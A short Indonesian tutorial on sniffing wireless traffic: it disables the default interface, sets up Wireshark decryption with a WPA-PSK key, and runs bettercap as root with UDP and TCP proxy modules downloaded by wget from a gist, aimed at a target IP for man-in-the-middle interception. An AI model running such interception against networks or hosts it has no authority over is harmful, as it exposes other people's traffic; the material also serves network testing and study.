Jika anda ingin melakukan sniff pada WLAN menggunakan Alfa Card, anda bisa mengikuti langkah-langkah dibawah ini.
- Matikan terlebih dahulu, default WLAN
ifconfig wlan0 down
. - Aktifkan Enable Decryption dan isi Keys dengan WPA-PSK dan Key. Key bisa dihasilkan dari situs ini.
- Pilih interfaces WLAN Alfa Card, Start Capture
Pada Terminal lakukan ini.
Terminal 1 (Intercept UDP Packets)
sudo wget -c https://gist.github.com/evilsocket/7fbbfc9b12826e7de7a1c97a921b7ce8/raw/df360cdc613969e5393a0a5ece78dc494df86506/example.rb -O udp.rb
sudo bettercap --udp-proxy-module udp.rb -X -I wlx00c0ca6ca107 -T 192.168.100.5
Terminal 2 (Intercept TCP Packets)
sudo wget -c https://gist.github.com/evilsocket/36da77e34766dc600218/raw/f060963f51c53769417e9ee7c4b53112fe7a31bb/example.rb -O tcp.rb
sudo bettercap --tcp-proxy-module tcp.rb -X -I wlx00c0ca6ca107 -T 192.168.100.5
Selanjutnya analisis packet pada Wireshark.
Kelemahan metode ini adalah tidak semua paket bisa didapatkan, sebaiknya gunakan Port Mirroring jika tersedia Switch/Router.